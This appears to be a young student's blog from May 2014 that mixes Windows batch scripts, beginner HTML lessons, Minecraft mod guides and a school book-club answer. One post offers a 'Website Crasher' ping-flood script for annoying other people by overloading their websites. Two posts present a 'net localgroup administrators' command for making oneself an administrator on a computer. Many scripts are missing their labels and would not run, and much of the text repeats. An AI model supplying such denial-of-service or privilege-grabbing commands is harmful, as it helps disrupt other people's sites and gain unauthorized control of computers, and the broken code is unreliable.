Today I have coded a pretty useful program that will make a folder where you want it with the name you want it to have. It can create folders in someone else's account if you are admin. Just copy it into notepad and save it as folder.bat
@echo off
@echo Which drive do you want the folder to go to?
@echo If you do not know what to do type what.
@echo If you know what to do type next.
set /p choice=
If %choice% EQU what goto what
If %choice% EQU next goto enter
@echo put the drive directory like this.
@echo Example
@echo ===============================================================================
@echo C:\Users\Bob\Desktop
@echo ===============================================================================
@echo Enter the name of the directory where you want to create your folder.
set /p choice2=
cd %choice2%
@echo Now enter the name of the folder you will create.
set /p choice3=
md "%choice3%"
@echo Would you like to make another folder? (yes or no)
set /p choice4=
If %choice4% EQU yes goto enter
If %choice4% EQU no goto bye
@echo Bye I hope this was a useful program for you.
Thursday, May 29, 2014
Wednesday, May 28, 2014
Countdown Timer with Calculator
Today I will show you how to create a countdown timer with a calculator so you know the time you need. Just type this code into notepad and save it as calc.bat . You can only count down in seconds and that is why it has a built in calculator.
@echo off
color 0b
echo Welcome to the timer. This timer only counts seconds.
echo Type in the amount of seconds to count. The number may range from 0 to
echo 99,999. If you need help converting minutes into seconds, type c for a
echo caculator.
set/p "time=>"
if %time%==c GOTO calc
if %time%==C GOTO calc
if %time% GTR 99999 GOTO bust
echo The time has been set! Press any key to start counting. You can stop the
echo timer by pressing any key. After stoping, the timer cannot continue.
color 0c
timeout %time%
echo (DING!)
goto menu
color 0a
echo Type the math problem below. This calculator doesn't accept decimals,
echo percents, etc. Only whole numbers.
set/p "math=>"
set/a nmath=%math%
echo %math%=%nmath%
echo Would you like to return to the timer or use the calculator again?
echo c or C= calculator
echo t or T= timer
set/p "route=>"
if %route%==c GOTO calc
if %route%==C GOTO calc
if %route%==t GOTO menu
if %route%==T GOTO menu
@echo off
color 0b
echo Welcome to the timer. This timer only counts seconds.
echo Type in the amount of seconds to count. The number may range from 0 to
echo 99,999. If you need help converting minutes into seconds, type c for a
echo caculator.
set/p "time=>"
if %time%==c GOTO calc
if %time%==C GOTO calc
if %time% GTR 99999 GOTO bust
echo The time has been set! Press any key to start counting. You can stop the
echo timer by pressing any key. After stoping, the timer cannot continue.
color 0c
timeout %time%
echo (DING!)
goto menu
color 0a
echo Type the math problem below. This calculator doesn't accept decimals,
echo percents, etc. Only whole numbers.
set/p "math=>"
set/a nmath=%math%
echo %math%=%nmath%
echo Would you like to return to the timer or use the calculator again?
echo c or C= calculator
echo t or T= timer
set/p "route=>"
if %route%==c GOTO calc
if %route%==C GOTO calc
if %route%==t GOTO menu
if %route%==T GOTO menu
Book Club
Social Studies
Which character am I most like.
I am most like Sam because I am the older brother in my family. I am also courageous like Sam. I would also try to protect my family and our stuff like Sam did when the soldiers were trying to steal his cows. I will try to defeat people who are trying to take the freedom of my family like Sam did against the British. I would fight for my family.
Social Studies
Which character am I most like.
I am most like Sam because I am the older brother in my family. I am also courageous like Sam. I would also try to protect my family and our stuff like Sam did when the soldiers were trying to steal his cows. I will try to defeat people who are trying to take the freedom of my family like Sam did against the British. I would fight for my family.
In School Work
Tuesday, May 27, 2014
Password Protected Command Prompt
If you ever have wanted people not messing with your command prompt(cmd) then just hide command prompt and put this code into notepad and save it as cmd.bat Then you have to type in a password to do cmd.
@echo off
title Log in to CMD
color 07
echo Cmd Accounts
echo =============
echo [1] Log In
echo [2] Sign Up
echo [3] Exit
set /p op=
if %op%==1 goto 1
if %op%==2 goto 2
if %op%==3 goto 3
goto error
echo Sign Up
echo ======================================
set /p newname="Enter new username:"
if "%newname%"=="%newname%" goto inputname
cd "%userprofile%\documents"
if exist "cmdacoBin" goto skip
if not exist "cmdacoBin" goto noskip
md "cmdacoBin"
goto skip
cd "%userprofile%\documents\cmdacoBin"
if exist "%newname%.bat" goto namexist
if not exist "%newname%.bat" goto skip2
echo set realusername=%newname%> "%newname%.bat"
goto next
set /p pswd=Enter new Password:
if "%pswd%"=="%pswd%" goto inputpass
cd "%userprofile%\documents\cmdacoBin"
echo set password=%pswd%>> "%newname%.bat"
goto next1
echo The entered username already exists.
echo Press any key to return. . .
pause >nul
goto 2
echo Cmd Accounts
echo ============
echo Your account has been successfully created!
goto home
color 07
echo Cmd Accounts Log In
echo ================================
Set /p logname=Username:
if "%logname%"=="%logname%" goto 2.1
set /p logpass="Password:"
if "%logpass%"=="%logpass%" goto login
cd "%userprofile%\documents\cmdacoBin"
if exist "%logname%.bat" goto call
if not exist "%logname%.bat" goto errorlog
call "%logname%.bat"
if "%password%"=="%logpass%" goto logdone
goto errorlog
color 0c
echo Username or Password incorrect.
echo Access denied.
pause >nul
goto home
echo Command Prompt
echo ==============
echo Successfully logged in!
goto account
cd "%userprofile%\documents\cmdacoBin"
call "%realusername%color.bat"
call "%realusername%.bat"
color %colorcode%
echo -------------------------------------------------------------------------------
echo %realusername%
echo -------------------------------------------------------------------------------
@echo off
break off
Title Command Prompt
color 0a
echo Type "home" any time to go to the current user profile directory.
echo Type "desktop" any time to go to the current user desktop.
echo Type help to see list of common commands like cd, rd, md, del,
echo ren, replace, copy, xcopy, move, attrib, tree, edit, and cls.
echo Type [command]/? for detailed info.
echo Directory: %CD%
set /P CMD=Command:
if "%CMD%" == "cls" goto cls
if "%CMD%" == "home" goto home2
if "%CMD%" == "desktop" goto desktop
if "%CMD%" == "red" goto red
if "%CMD%" == "green" goto green
if "%CMD%" == "normal" goto normal
cd C:\
goto cmd
goto cmd
goto cmd
cd /d %SystemDrive%\Users\%USERNAME%\Desktop
goto cmd
color 0c
goto cmd
color 0a
goto cmd
color 07
goto cmd
@echo off
title Log in to CMD
color 07
echo Cmd Accounts
echo =============
echo [1] Log In
echo [2] Sign Up
echo [3] Exit
set /p op=
if %op%==1 goto 1
if %op%==2 goto 2
if %op%==3 goto 3
goto error
echo Sign Up
echo ======================================
set /p newname="Enter new username:"
if "%newname%"=="%newname%" goto inputname
cd "%userprofile%\documents"
if exist "cmdacoBin" goto skip
if not exist "cmdacoBin" goto noskip
md "cmdacoBin"
goto skip
cd "%userprofile%\documents\cmdacoBin"
if exist "%newname%.bat" goto namexist
if not exist "%newname%.bat" goto skip2
echo set realusername=%newname%> "%newname%.bat"
goto next
set /p pswd=Enter new Password:
if "%pswd%"=="%pswd%" goto inputpass
cd "%userprofile%\documents\cmdacoBin"
echo set password=%pswd%>> "%newname%.bat"
goto next1
echo The entered username already exists.
echo Press any key to return. . .
pause >nul
goto 2
echo Cmd Accounts
echo ============
echo Your account has been successfully created!
goto home
color 07
echo Cmd Accounts Log In
echo ================================
Set /p logname=Username:
if "%logname%"=="%logname%" goto 2.1
set /p logpass="Password:"
if "%logpass%"=="%logpass%" goto login
cd "%userprofile%\documents\cmdacoBin"
if exist "%logname%.bat" goto call
if not exist "%logname%.bat" goto errorlog
call "%logname%.bat"
if "%password%"=="%logpass%" goto logdone
goto errorlog
color 0c
echo Username or Password incorrect.
echo Access denied.
pause >nul
goto home
echo Command Prompt
echo ==============
echo Successfully logged in!
goto account
cd "%userprofile%\documents\cmdacoBin"
call "%realusername%color.bat"
call "%realusername%.bat"
color %colorcode%
echo -------------------------------------------------------------------------------
echo %realusername%
echo -------------------------------------------------------------------------------
@echo off
break off
Title Command Prompt
color 0a
echo Type "home" any time to go to the current user profile directory.
echo Type "desktop" any time to go to the current user desktop.
echo Type help to see list of common commands like cd, rd, md, del,
echo ren, replace, copy, xcopy, move, attrib, tree, edit, and cls.
echo Type [command]/? for detailed info.
echo Directory: %CD%
set /P CMD=Command:
if "%CMD%" == "cls" goto cls
if "%CMD%" == "home" goto home2
if "%CMD%" == "desktop" goto desktop
if "%CMD%" == "red" goto red
if "%CMD%" == "green" goto green
if "%CMD%" == "normal" goto normal
cd C:\
goto cmd
goto cmd
goto cmd
cd /d %SystemDrive%\Users\%USERNAME%\Desktop
goto cmd
color 0c
goto cmd
color 0a
goto cmd
color 07
goto cmd
Monday, May 26, 2014
Website Crashing Code
Website crashing can be fun because people will get extremely annoyed. If you ever wanted the crash someones website then all you have to do is type in this code and wait for about 10-20 minutes. You operate it by typing in the website URL (http:// or https:// not included) and press enter. It will ping the website with so much data the website will not be able to process the data and send it back in time. Then the website becomes really slow because it is working so hard returning the ping data. Then to end the crashing press CTRL + C.
@echo off
Title Website Crasher
color 0e
echo Enter the website you would like to crash
set input=
set /p input= Enter your Website here:
if %input%==goto A if NOT B
echo Processing Your request
ping localhost>nul
echo To end Crashing press CTRL + C
ping localhost>nul
echo ----------------------------------------------------------------------
echo Now Crashing Website...DO NOT CLOSE THIS BOX!! PRESS CRTL + C TO END!!
echo ----------------------------------------------------------------------
ping %input% -t -l 10000
@echo off
Title Website Crasher
color 0e
echo Enter the website you would like to crash
set input=
set /p input= Enter your Website here:
if %input%==goto A if NOT B
echo Processing Your request
ping localhost>nul
echo To end Crashing press CTRL + C
ping localhost>nul
echo ----------------------------------------------------------------------
echo Now Crashing Website...DO NOT CLOSE THIS BOX!! PRESS CRTL + C TO END!!
echo ----------------------------------------------------------------------
ping %input% -t -l 10000
Friday, May 23, 2014
Secure Folder
This is a secure folder that is invisible and can only be accessed by this batch program. First go to your desktop and right click the background. Then hover over new and press text document. Then do the same thing except create a new folder instead of a text document. Open the folder and put the text document in. Then right click the folder and select properties. Near the bottom of the properties page there will be a check box with the word hidden right next to it. Check the box and press apply and when the dialogue box comes up, select the answer that says this folder and all of the sub folders etc. Then go to the desktop and make another new text document. This time save it as pass.bat . At the places where it says <username goes here> put your username and at the places where it says <password goes here> put your password. At the part where it says <name of folder goes here> paste the name of your folder (C:\Users\Tate\Desktop\Secret-Folder). You can not put a space in the folder name or it will not work. Right click the document and paste this code into it.
ECHO Enter User ID:
IF %USERID% EQU <username goes here> GOTO PASSWORD
IF %USERID% LSS <username goes here> GOTO INVALID
IF %USERID% GTR <username goes here> GOTO INVALID
ECHO Enter autherization code:
IF %PASSWORD% EQU <password goes here> GOTO MAIN
IF %PASSWORD% LSS <password goes here> GOTO INVALID
IF %PASSWORD% GTR <password goes here> GOTO INVALID
PING -n 3 > NUL
ECHO Please try again...
PING -n 3 > NUL
ECHO Enter User ID:
IF %USERID% EQU <username goes here> GOTO PASSWORD2
IF %USERID% LSS <username goes here> GOTO INVALID2
IF %USERID% GTR <username goes here> GOTO INVALID2
ECHO Enter autherization code:
IF %PASSWORD% EQU <password goes here> GOTO MAIN
IF %PASSWORD% LSS <password goes here> GOTO INVALID2
IF %PASSWORD% GTR <password goes here> GOTO INVALID2
PING -n 3 > NUL
ECHO Please try again...
PING -n 3 > NUL
shutdown.exe /s /t 00
ECHO Welcome...
ECHO You are super awesome...
start <name of folder goes here>
PING -n 3 > NUL
The program will open the folder and then you can put stuff into it. If you get the password wrong twice it will shutdown the computer so people can't keep trying.
Thursday, May 22, 2014
Just so everyone knows the admin trick is only for windows computers and there is another way to do it.
Press windows key and r together and it will open the run program. Then type cmd into the box and click ok. This will open cmd (Command Prompt). Then type in.
net localgroup administrators USERNAME /add
You need to make the USERNAME your username for the computer. This will either make you an admin or deny your access.
Press windows key and r together and it will open the run program. Then type cmd into the box and click ok. This will open cmd (Command Prompt). Then type in.
net localgroup administrators USERNAME /add
You need to make the USERNAME your username for the computer. This will either make you an admin or deny your access.
Wednesday, May 21, 2014
How to make yourself an admin
If you want to become an admin on a computer then just type the following code into notepad and save it as Admin.bat The only reason you have to put the pause is to check if the access is denied and so you don't have to keep trying to get a screenshot of it.
net localgroup administrators USERNAME /add
If you want to delete yourself or a friend from admin then type in this code.
net localgroup administrators USERNAME /delete
If your access for admin is denied it will show up like this is the red circle.
net localgroup administrators USERNAME /add
If you want to delete yourself or a friend from admin then type in this code.
net localgroup administrators USERNAME /delete
If your access for admin is denied it will show up like this is the red circle.
Tuesday, May 20, 2014
How to put moving text on your blog
Today I am going to show you how to put moving text on your blog.
First you make a new post on your blog. Then go to the HTML editor and write <marquee>What ever you want goes here</marquee>
Then publish the post and the text will move like this.
Monday, May 19, 2014
How to get mods version 2
Do not do this with
This is the second easiest way to get mods in Minecraft and it is NOT only for windows. First search up the mod you want and when you think you have found the right site then download the mod. Once you have the mod you must get to the minecraft.jar in your computer files. If you are using windows then the easiest way to find it is to search up %appdata% is the search bar in the windows explorer then click on roaming then click on minecraft.jar. After you have gotten to minecraft.jar then go to the mods folder in it. Go to your downloads folder on a different tab and grab the folder of the mod and place it in the mods folder. Then you have to run Minecraft and play it on the forge profile.Sunday, May 18, 2014
How to get a new Ubuntu OS
Today I am going to show you how to get some Operating Systems (OS) in the Ubuntu series. First enter in the URL bar. Then select the version you need of it. Then press download. Skip all the donation parts unless you want to donate and go to the link that says not now take me to the download. It should automatically download within 10 seconds. Once you have downloaded it open it and press the next button until it lets you pick which version of it you want (Ubuntu, MythBuntu, EdBuntu etc.). Ubuntu is the best and most advanced version. Wait for it to install then restart your computer. When you turn it on there should be an option list that has the OS you just installed and your old windows one. Press the down arrow and press enter. You password will be the same as the windows one. That is all for today.
Friday, May 16, 2014
Thursday, May 15, 2014
How to get mods for Minecraft
Today I will show you how to get mods in Minecraft. There are different ways to do this. I am going to show you 1 easy way.
Step 2. Find the mod you want and make sure it is for the version of Minecraft you use.
Step 3. Click on it and go to the download links right above the comments.
Step 8. Open the extracted launcher and click the big green Add Mod button.
Step 9. The mod will install and you just have to open minecraft.
Step 1. Goto www.skydaz.comStep 2. Find the mod you want and make sure it is for the version of Minecraft you use.
Step 3. Click on it and go to the download links right above the comments.
Step 4. Click on the second download link.
Step 5. It will take you to adfly and you must wait 5 seconds then click the skip add button in the top right corner.
Step 6. Go to your downloads folder then click on the zipped folder containing the launcher and open the launcher.
Step 7. A pop-up box will appear and you must click extract.Step 8. Open the extracted launcher and click the big green Add Mod button.
Step 9. The mod will install and you just have to open minecraft.
Wednesday, May 14, 2014
HTML Lessons part 20
In this lesson I am going to teach you how to use the <span> tag. The span tag is used for special styling inside a paragraph. You can make multiple different spans like this <span2> <span3> and so on. You can code it like this.
<p style="color: blue">Hi whats <span style="color: red">your</span> name?</p>
It would turn out like this.
You can also style spans with CSS or <style>. That is all for today!
<p style="color: blue">Hi whats <span style="color: red">your</span> name?</p>
It would turn out like this.
Hi whats your name?
You can also style spans with CSS or <style>. That is all for today!
Tuesday, May 13, 2014
HTML Lessons part 19
In this lesson I am going to teach you how to use the <table> tag but only the basics of it. This is how to code a table.
The <tr> element is a row of data cells and the <td> tag is one of the datacell/columns. You can add more than one row. You can also style it. If you want to style the whole row then put the style in the <tr> but is you want is only in the datacell the just put it in the <td>. That is all for today!
The <tr> element is a row of data cells and the <td> tag is one of the datacell/columns. You can add more than one row. You can also style it. If you want to style the whole row then put the style in the <tr> but is you want is only in the datacell the just put it in the <td>. That is all for today!
Monday, May 12, 2014
HTML Lessons part 18
In this lesson I will teach you how to use the <link> tag. The link tag is an empty element just like the <img> tag. The <link> tag is a link to a CSS stylesheet. CSS is Cascading Style Sheets. CSS is used instead of using the <style> tag. The link goes in the head. You make the link like this.
<link rel="stylesheet" type="text/css" href="something.css">
What you have to do is make a CSS document is code it then save is with a .CSS extension. Then right click the CSS file. Click open with and select a browser besides Internet Explorer. The copy the URL of the CSS document into the place with the crossed out text in the code above. It will add the special styling that could also go in the style tag. That is all for today.
<link rel="stylesheet" type="text/css" href="
What you have to do is make a CSS document is code it then save is with a .CSS extension. Then right click the CSS file. Click open with and select a browser besides Internet Explorer. The copy the URL of the CSS document into the place with the crossed out text in the code above. It will add the special styling that could also go in the style tag. That is all for today.
Saturday, May 10, 2014
HTML Lessons part 17
In this lesson I will teach you how to make the <style> tag. The style tag goes inside the head of an HTML document. <style> is used instead of <p style="font-size: 50px"> and so on. Inside the style element you write the code in CSS like this.
If you try to do 'a' for links it changes all of the text to that style not links. Just make sure you put the <style> tags inside the head or it will not work. That is all for today.
p {
font-size: 20px; color: green;
The 'p' tells it which tag you want is to change and it changes all <p> tags to look like that.
If you try to do 'a' for links it changes all of the text to that style not links. Just make sure you put the <style> tags inside the head or it will not work. That is all for today.
Friday, May 9, 2014
HTML Lessons part 16
In this lesson I will teach you how to add Javascript to your webpage. It is very easy all you have to do is out the <script> tag is your webpage then in between the 2 tags write the Javascript.
Here is some Javascript.
That is all for today.
Thursday, May 8, 2014
HTML Lessons part 15
In this lesson I will teach you how to make buttons like this.
To make buttons you need to code it like this.
<button type="button">Click Me!</button>
This will make a normal button. To make a button like the one at the top you should do a code like this.
<button type="button" onclick="alert('Hello world!')">Click Me!</button>
That one will make it say "Hello world" is a pop up box. You have to add type="button" for it to know. You can also make buttons links by putting in the link tag like this.
<a href="">
<button type="button">Hi!</button><a/a>
To make buttons you need to code it like this.
<button type="button">Click Me!</button>
This will make a normal button. To make a button like the one at the top you should do a code like this.
<button type="button" onclick="alert('Hello world!')">Click Me!</button>
That one will make it say "Hello world" is a pop up box. You have to add type="button" for it to know. You can also make buttons links by putting in the link tag like this.
<a href="">
<button type="button">Hi!</button><a/a>
Wednesday, May 7, 2014
HTML Lessons part 14
In this lesson I will teach you how to make scrolling text. This tag is very simple. It does not go inside the <p> tag like most special text things do. It is the <marquee> You make it like this.
This is what is looks like. That is all for today!
This is what is looks like. That is all for today!
Tuesday, May 6, 2014
HTML Lessons part 13
In this lesson I will teach you how to make the <iframe> tag. Iframe stands for inline frame. An iframe is like a webpage inside another webpage. I will demonstrate one. In this image I have put an iframe of GameStar Mechanic.
I will show you how to make an <iframe>.
<iframe src="" width="200" height="200" scrolling="yes" seamless>
The src is where you put the URL of a website. You have to put the HTTP also. Width is for the width and height is for the height. There is no length.
scrolling can be yes no or auto or you could just leave it out. You can also add seamless at the end of the tag so it blends into the page better. There are more attributes of the iframe tag that you can see if you click this link. Click Me!
That is all for today. Make sure you look at Code Academy for beginning and how to code the document properly.

<iframe src="" width="200" height="200" scrolling="yes" seamless>
The src is where you put the URL of a website. You have to put the HTTP also. Width is for the width and height is for the height. There is no length.
scrolling can be yes no or auto or you could just leave it out. You can also add seamless at the end of the tag so it blends into the page better. There are more attributes of the iframe tag that you can see if you click this link. Click Me!
That is all for today. Make sure you look at Code Academy for beginning and how to code the document properly.
Monday, May 5, 2014
HTML Lessons part 12
In this lesson you are going to learn about drop-down menus. Drop down menus only work on Google Chrome, Opera, and Safari. They do not work on Internet Explorer, or Mozilla Firefox. Drop-down menus are made with the <details> tag and the <summary> tag. The summary tag is like the title of the menu. This is how to code them.
<p>He said hi.</p>
This is what the code above would turnout like. Click the arrow. If you are using one of the unsupported browsers listed above then download Google Chrome or one of the other supported browsers.
He said hi.
That is all for today. By the way, to learn how to code HTML even better go to Code Academy for the basics and once you have learned all that go to w3schools for more tags and elements.
<p>He said hi.</p>
This is what the code above would turnout like. Click the arrow. If you are using one of the unsupported browsers listed above then download Google Chrome or one of the other supported browsers.
That is all for today. By the way, to learn how to code HTML even better go to Code Academy for the basics and once you have learned all that go to w3schools for more tags and elements.
Sunday, May 4, 2014
HTML Lessons part 11
In this lesson I am going to teach you how to use <sup> and <sub>. These 2 tags like the <abbr> tag go inside paragraphs.
<sup>raises text
and <sub>lowers text
<p>Hi this is <sup>high</sup> and this is <sub>low</sub>.</p>That is is for today.
<sup>raises text
and <sub>lowers text
<p>Hi this is <sup>high</sup> and this is <sub>low</sub>.</p>That is is for today.
Thursday, May 1, 2014
HTML Lessons part 10
In this lesson I am going to teach you how to make the <abbr> tag.
Hover you mouse over the abbreviation NHL.
National Hockey League should come up. To do this you need to put the tag inside a paragraph. You make the tag like this.
<p><abbr title="">WHO</abbr></p>
<p>The <abbr title="World Health Organization">WHO</abbr> is evil.</p>
In the title area goes the full name of the thing.
That is all for today.
Hover you mouse over the abbreviation NHL.
National Hockey League should come up. To do this you need to put the tag inside a paragraph. You make the tag like this.
<p><abbr title="">WHO</abbr></p>
<p>The <abbr title="World Health Organization">WHO</abbr> is evil.</p>
In the title area goes the full name of the thing.
That is all for today.
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